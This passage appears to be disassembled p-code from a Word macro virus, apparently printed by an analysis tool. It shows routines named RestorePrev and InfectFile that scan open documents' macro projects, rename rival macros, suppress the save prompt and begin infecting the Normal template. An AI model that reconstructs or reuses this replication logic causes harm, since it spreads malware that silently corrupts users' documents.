' Line #27:
' 	Dim 
' 	VarDefn virusExist (As Boolean)
' Line #28:
' 	Dim 
' 	VarDefn otherV (As Boolean)
' Line #29:
' 	Dim 
' 	VarDefn otherVName (As String)
' Line #30:
' Line #31:
' Line #32:
' 	FuncDefn (Sub RestorePrev())
' Line #33:
' 	OnError (Resume Next) 
' Line #34:
' 	LitVarSpecial (False)
' 	St otherV 
' Line #35:
' 	StartForVariable 
' 	Ld ndxMac 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	MemLd vbcomponents 
' 	MemLd Count 
' 	For 
' Line #36:
' 	Ld ndxMac 
' 	Ld ThisDocument 
' 	MemLd VBProject 
' 	ArgsMemLd vbcomponents 0x0001 
' 	MemLd New 
' 	St itemName 
' Line #37:
' 	LineCont 0x0004 09 00 0C 00
' 	Ld itemName 
' 	Ld MyName 
' 	Ne 
' 	Ld itemName 
' 	Ld TD 
' 	Ne 
' 	And 
' 	Ld itemName 
' 	Ld RTNorm 
' 	Ne 
' 	And 
' 	Ld itemName 
' 	LitStr 0x0000 ""
' 	Ne 
' 	And 
' 	IfBlock 
' Line #38:
' 	QuoteRem 0x0008 0x001C "----------------------------"
' Line #39:
' 	Ld itemName 
' 	St otherVName 
' Line #40:
' 	LitVarSpecial (True)
' 	St otherV 
' Line #41:
' 	GoTo OthersFound 
' Line #42:
' 	EndIfBlock 
' Line #43:
' 	StartForVariable 
' 	Ld ndxMac 
' 	EndForVariable 
' 	NextVar 
' Line #44:
' Line #45:
' 	StartForVariable 
' 	Ld openDoc 
' 	EndForVariable 
' 	Ld Documents 
' 	ForEach 
' Line #46:
' 	StartForVariable 
' 	Ld ndxMac 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld openDoc 
' 	MemLd VBProject 
' 	MemLd vbcomponents 
' 	MemLd Count 
' 	For 
' Line #47:
' 	Ld ndxMac 
' 	Ld openDoc 
' 	MemLd VBProject 
' 	ArgsMemLd vbcomponents 0x0001 
' 	MemLd New 
' 	St itemName 
' Line #48:
' 	LineCont 0x0004 09 00 10 00
' 	Ld itemName 
' 	Ld MyName 
' 	Ne 
' 	Ld itemName 
' 	Ld TD 
' 	Ne 
' 	And 
' 	Ld itemName 
' 	Ld RTNorm 
' 	Ne 
' 	And 
' 	Ld itemName 
' 	LitStr 0x0000 ""
' 	Ne 
' 	And 
' 	IfBlock 
' Line #49:
' 	QuoteRem 0x000C 0x0017 "-----------------------"
' Line #50:
' 	Ld itemName 
' 	St otherVName 
' Line #51:
' 	LitVarSpecial (True)
' 	St otherV 
' Line #52:
' 	GoTo OthersFound 
' Line #53:
' 	EndIfBlock 
' Line #54:
' 	StartForVariable 
' 	Ld ndxMac 
' 	EndForVariable 
' 	NextVar 
' Line #55:
' 	StartForVariable 
' 	Ld openDoc 
' 	EndForVariable 
' 	NextVar 
' Line #56:
' Line #57:
' 	Label OthersFound 
' Line #58:
' 	Ld otherV 
' 	IfBlock 
' Line #59:
' 	LineCont 0x0010 03 00 0C 00 09 00 0C 00 0D 00 0C 00 11 00 0C 00
' 	Ld ThisDocument 
' 	MemLd FullName 
' 	ParamNamed Source 
' 	Ld otherVName 
' 	ParamNamed New 
' 	Ld MyName 
' 	ParamNamed NewName 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerRename 0x0004 
' Line #60:
' 	EndIfBlock 
' Line #61:
' 	EndSub 
' Line #62:
' Line #63:
' 	FuncDefn (Sub InfectFile())
' Line #64:
' 	Dim 
' 	VarDefn NTInfected (As Boolean)
' Line #65:
' 	Dim 
' 	VarDefn ODInfected (As Boolean)
' Line #66:
' Line #67:
' 	OnError (Resume Next) 
' Line #68:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #69:
' 	ArgsCall (Call) RestorePrev 0x0000 
' Line #70:
' 	LitVarSpecial (False)
' 	St NTInfected 
' Line #71:
' 	StartForVariable 
' 	Ld ndxMac 
' 	EndForVariable 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd vbcomponents 
' 	MemLd Count 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	UMi 
' 	ForStep 
' Line #72:
' 	Ld ndxMac 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd vbcomponents 0x0001 
…